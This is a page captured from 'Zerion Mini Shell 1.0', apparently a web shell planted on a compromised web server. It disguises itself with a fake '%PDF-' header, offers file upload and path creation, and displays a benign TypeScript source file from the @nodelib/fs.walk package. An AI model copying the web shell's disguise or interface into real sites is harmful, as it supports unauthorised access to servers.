%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/forge/takeaseat.eco-n-tech.co.uk/node_modules/@nodelib/fs.walk/src/providers/
Upload File :
Create Path :
Current File : //home/forge/takeaseat.eco-n-tech.co.uk/node_modules/@nodelib/fs.walk/src/providers/sync.ts

import SyncReader from '../readers/sync';
import Settings from '../settings';
import { Entry } from '../types';

export default class SyncProvider {
	protected readonly _reader: SyncReader = new SyncReader(this._root, this._settings);

	constructor(private readonly _root: string, private readonly _settings: Settings) { }

	public read(): Entry[] {
		return this._reader.read();
	}
}

Zerion Mini Shell 1.0